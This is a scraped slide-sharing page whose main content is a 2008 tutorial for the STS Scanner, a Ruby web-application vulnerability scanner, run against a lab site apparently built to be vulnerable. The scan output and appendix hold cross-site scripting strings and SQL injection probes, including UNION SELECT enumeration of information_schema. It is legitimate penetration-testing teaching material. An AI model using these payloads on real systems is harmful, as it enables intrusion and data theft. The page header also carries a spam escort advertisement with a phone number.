The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 

sts-scanner_tutorial

  • 1. STS Scanner Tutorial By Jordan Del-Grande Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 1 of 13
  • 2. Table of Contents STS Scanner Tutorial.....................................................................................................1 Preamble...................................................................................................................3 Introduction..............................................................................................................3 Installation................................................................................................................3 The Assessment........................................................................................................4 Reconnaissance ....................................................................................................4 Enumeration..........................................................................................................7 Testing..................................................................................................................7 Reviewing the Results...........................................................................................8 Future Improvements................................................................................................9 Appendix A: STS-Scanner Report...............................................................................10 Company Details..........................................................................................................13 About the Author....................................................................................................13 Contact Information................................................................................................13 Copyright © 2008 by Security Technology Science Pty Ltd www.securitytechscience.com Page 2 of 13
Preamble

This paper is a how-to on the correct usage of the STS Scanner. The tool is freely available for download at http://www.securitytechscience.com/resources/. The information is made available to educate testers on how to discover these vulnerabilities and developers on how to prevent writing applications that contain these types of vulnerabilities. All techniques in this paper were performed within the confines of the Security Technology Science Testing Lab. Only test on applications that are either under your direct ownership or you have written legal authorisation to test.

Introduction

The STS Scanner is specifically a web application scanner. It is not designed to replace the penetration tester or the penetration test. It is a tool that should assist the penetration tester in performing a vulnerability assessment/penetration test and hence is only one step of many in the process. With that said, the paper is organised in much the same fashion as the high-level steps in a penetration test. It should not be mistaken that this is the be-all and end-all of the penetration test. The other sections of a penetration test have been excluded in order to focus primarily on how to use the STS Scanner. For a comprehensive guide on performing a penetration test see the OWASP Testing Project: http://www.owasp.org/index.php/Category:OWASP_Testing_Project.

Installation

Step 1: Install Ruby

The STS Scanner has been completely written in the Ruby programming language. Information on how to download and install Ruby can be found at http://www.ruby-lang.org/en/downloads/.

Step 2: Install RubyGems

Note: For those using Windows, you can skip this step if you used the Ruby One-Click Installer. There is one RubyGems library which is needed, and as such RubyGems is necessary. Information on how to download and install RubyGems can be found at http://rubygems.org/.

Step 3: Install Hpricot

Hpricot is a RubyGems library used for parsing HTML pages. Run the following from the command line as a privileged user:

    gem install hpricot --remote

Step 4: Run STS Scanner

To test that the installation was a success, run the STS Scanner from the command line.
Step 5: Check out the STS Scanner Options

Run:

    ruby sts-scanner.rb --help

The Assessment

Now that some background contextual information has been provided and you have installed the necessary components, let's begin by performing a web application scan on the Security Technology Science vulnerable web application, "OnlineBusiness". There will in fact be 3 separate scans run in order to ensure that the majority of the application's attack surface area is completely discovered. The scans can be categorised as follows:

1. Reconnaissance Scan (Blind Scan) – Spider the site then scan
2. Unauthenticated Scan – Manually crawl the site then scan
3. Authenticated Scan – Manually crawl the site as an authenticated user then scan

Reconnaissance

As this is a black box assessment, the only information provided to us is the URL of the application to be tested: http://onlinebusiness.com.au/. Browsing to the site we see the following page.
Figure 1.0 – OnlineBusiness Home Page

At present we have gathered enough information to perform a reconnaissance/blind scan. We have the URL and we can see that the application runs over HTTP on port 80. We can kick off the sts-scanner to firstly spider the application and then perform the appropriate tests by running the following command:

    ruby sts-scanner.rb http://onlinebusiness.com.au

    Starting the Web Crawler...
    .
    .
    Web Crawler Complete!
    Starting Application Scan => http://onlinebusiness.com.au
    h ..
    ALERT: Directory Listing Detected => GET /images/
    .....
    ALERT: Cross-Site Scripting Vulnerability Detected in Repsonse Body => GET /contacts.php
    .....................
    Application Scan Complete!
    Compiling results...Done!
We will continue on with the reconnaissance to ensure that the majority of the application's attack surface area is completely recognised. After all, there are certain pages that the spider cannot yet recognise, such as those reached only through certain JavaScript and Ajax code. As such, we will launch Burp Suite and begin manually crawling the application, logging all requests to a local file.

Firstly, configure your browser to proxy all requests locally over port 8080.

Figure 1.1 – Set up proxy

Next, configure Burp Proxy to log all requests to a local file 'onlinebusiness.burp'.

Figure 1.2 – Logging all requests locally
Finally, test that a request is passed through the Burp Proxy and begin the crawl of the entire application.

Figure 1.3 – Burp Proxy Request

Enumeration

After crawling the website, we notice there is a 'Login' page, so we can assume there is a section of this application that requires authentication and the appropriate levels of authorisation to be viewed. Leveraging the techniques from the "Application Username Enumeration" whitepaper found at http://www.securitytechscience.com/resources/, we discover a user name of '10006' and a password of 'password', with the application using cookies to track user sessions. We now use these credentials to log into the application, create a new Burp log file called 'onlinebusiness-authenticated.burp' and perform the crawl again.

Note: We are careful not to click on any logout or change password links.

Testing

We can now begin the unauthenticated scan of the application. It's a simple matter of providing the sts-scanner with the Burp file location:

    ruby sts-scanner.rb --log onlinebusiness.burp http://onlinebusiness.com.au

Next we need to perform the authenticated scan of the application. As we now know the application uses cookies to track user sessions, we need to use Burp Proxy in order to view the session cookie. Log into the application and then make sure the 'intercept is on' button is enabled within Burp Proxy. Click on any link or perform a refresh of the current page and look for the session cookie.
Figure 1.4 – Session Cookie

Using the session cookie identified, and while still remaining logged into the application, we can now perform the authenticated scan:

    ruby sts-scanner.rb --log onlinebusiness-authenticated.burp --cookie "sessionid=123456" http://onlinebusiness.com.au

Reviewing the Results

After every scan is complete, the sts-scanner produces several different files. They are:

1. spider.log – log of all the spider's requests and responses
2. scanner.log – log of all the scanner's requests and responses
3. date-time-host.txt – text file of the attack surface area and the vulnerabilities discovered

Note: For the sake of brevity we are only going to focus on the last file. The complete file is located in Appendix A.

Section 1: Target

This section contains the target host the scanner tested. That is, http://onlinebusiness.com.au.

    ** STS Web Application Scanner **
    Target => http://onlinebusiness.com.au

Section 2: Crawl

This section contains the surface area the spider was able to identify.

    ** Crawling Target Site **
    GET /
    GET /images/glasses.jpg
    GET /images/english.gif
    GET /contacts.php
    POST /contacts.php?postcode=
    ...

Section 3: Vulnerabilities

This section contains the identified vulnerabilities from the scan. Going from top to bottom there is a directory listing identified, two cross-site scripting holes and one definite SQL injection where the scanner identified the DBMS as MySQL and that there are 5 varchar columns in the table.

    ** Starting Application Scan **
    ALERT: Directory Listing Detected => GET /images/
    ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => GET /contacts.php user-agent: "><script>alert('Vulnerable');</script>
    ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => POST /contacts.php?postcode="><script>alert('Vulnerable');</script>
    ALERT: MySQL Database Error Message Detected => POST /contacts.php?postcode=te'st
    ALERT: Possible SQL Injection Exploit => POST /contacts.php?postcode=1%20OR%20'1'%3D'1'--
    ALERT: Enumerated column number blind: 5 => POST /contacts.php?postcode=1%20ORDER%20BY%206--
    ALERT: Verified database type blind: mysql => POST /contacts.php?postcode=1%20UNION%20ALL%20SELECT%20null,null,null,null,null%20FROM%20information_schema.TABLES--
    ALERT: Enumerated data types blind => POST /contacts.php?postcode=1%20UNION%20ALL%20SELECT%20'b','b','b','b','b'%20FROM%20information_schema.TABLES--
    ...

Future Improvements

The STS Scanner uses Mechanize and Hpricot to parse and spider HTML pages. These libraries are not able to parse and identify JavaScript and/or Ajax code. A separate version of the STS Scanner is to be developed where the internal core does not rely on these libraries and they shall become obsolete. The core shall act more like an everyday browser (i.e., IE, Firefox, etc.) so it can hopefully branch out into other applications such as Flash and web services. The testing modules are currently limited to performing only 3 types of tests (i.e., SQL injection, XSS injection, directory indexing). These are to be expanded to incorporate more injection tests such as CSRF, code execution, HTTP response splitting, etc. The reporting functionality is to be updated to produce PDF files containing clickable links, statistics and graphs.
Appendix A: STS-Scanner Report

    ** STS Web Application Scanner **
    Target => http://onlinebusiness.com.au
    ** Crawling Target Site **
    GET /
    GET /images/glasses.jpg
    GET /images/english.gif
    GET /images/french.gif
    GET /images/russian.gif
    GET /contacts.php
    POST /contacts.php?postcode=
    GET /database/contacts.txt
    GET /login.php
    POST /login.php?login=&password=
    GET /login.php?msg='Username%20does%20not%20exist'
    POST /login.php?login=&password=
    GET /logininformation.php
    GET /products.php
    POST /products.php?name=&description=&type=Stock
    GET /index.php
    ** Crawling Complete **
    ** Starting Application Scan **
    ALERT: Directory Listing Detected => GET /images/
    ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => GET /contacts.php user-agent: "><script>alert('Vulnerable');</script>
    ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => POST /contacts.php?postcode="><script>alert('Vulnerable');</script>
    ALERT: MySQL Database Error Message Detected => POST /contacts.php?postcode=te'st
    ALERT: Possible SQL Injection Exploit => POST /contacts.php?postcode=1%20OR%20'1'%3D'1'--
    ALERT: Enumerated column number blind: 5 => POST /contacts.php?postcode=1%20ORDER%20BY%206--
    ALERT: Verified database type blind: mysql => POST /contacts.php?postcode=1%20UNION%20ALL%20SELECT%20null,null,null,null,null%20FROM%20information_schema.TABLES--
    ALERT: Enumerated data types blind => POST /contacts.php?postcode=1%20UNION%20ALL%20SELECT%20'b','b','b','b','b'%20FROM%20information_schema.TABLES--
    ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => POST /contacts.php?postcode= user-agent: "><script>alert('Vulnerable');</script>
    ALERT: Directory Listing Detected => GET /database/
    ALERT: Cross-Site Scripting Vulnerability Detected in Response Body => GET /login.php?msg="><script>alert('Vulnerable');</script>
    ALERT: MySQL Database Error Message Detected => POST /products.php?name=te'st&description=&type=Stock
    ALERT: Possible SQL Injection Exploit => POST /products.php?name=1'%20OR%20'1'%3D'1&description=&type=Stock
    ALERT: Verified Database Type: mysql => POST /products.php?name=1'%20UNION%20ALL%20select%20FOO%20from%20BLAH%20where%20'1'%3D'1&description=&type=Stock
    ALERT: Column Enumeration Successful: 3 => POST /products.php?name=1'%20UNION%20ALL%20select%20null,null,null%20from%20information_schema.TABLES%20where%20'1'%3D'1&description=&type=Stock
    ALERT: Enumerated data types => POST /products.php?name=1'%20UNION%20ALL%20select%20'b','b','b'%20from%20information_schema.TABLES%20where%20'1'%3D'1&description=&type=Stock
    ALERT: MySQL Database Error Message Detected => POST /products.php?name=&description=te'st&type=Stock
    ALERT: Possible SQL Injection Exploit => POST /products.php?name=&description=1'%20OR%20'1'%3D'1&type=Stock
    ALERT: Verified Database Type: mysql => POST /products.php?name=&description=1'%20UNION%20ALL%20select%20FOO%20from%20BLAH%20where%20'1'%3D'1&type=Stock
    ALERT: Column Enumeration Successful: 3 => POST /products.php?name=&description=1'%20UNION%20ALL%20select%20null,null,null%20from%20information_schema.TABLES%20where%20'1'%3D'1&type=Stock
    ALERT: Enumerated data types => POST /products.php?name=&description=1'%20UNION%20ALL%20select%20'b','b','b'%20from%20information_schema.TABLES%20where%20'1'%3D'1&type=Stock
    ** Scan Finished **
    ** Attack Surfaces **
    == Parameter Attack Surface ==
    = HTTP Client Header =
    cookie
    referer
    user-agent
    = GET/POST Parameter =
    GET /login.php+msg
    POST /contacts.php+postcode
    POST /login.php+login+password
    POST /products.php+name+description+type
    == Directory Attack Surface ==
    GET /
    GET /database/
    GET /images/
    == File Attack Surface ==
    GET /contacts.php
    GET /database/contacts.txt
    GET /index.php
    GET /login.php
    GET /logininformation.php
    GET /products.php
    ** End of Attack Surface **
Company Details

About the Author

Jordan Del-Grande, Director and Principal Consultant at Security Technology Science, has several years of successful management and consulting experience performing Information Security and Risk Management services in predominantly financial organisations. Prior to Security Technology Science, he spent several years as a consultant with Ernst & Young and the Advanced Security Center.

Contact Information

Company Name: Security Technology Science Pty Ltd
Email: info@securitytechscience.com
Web Site: www.securitytechscience.com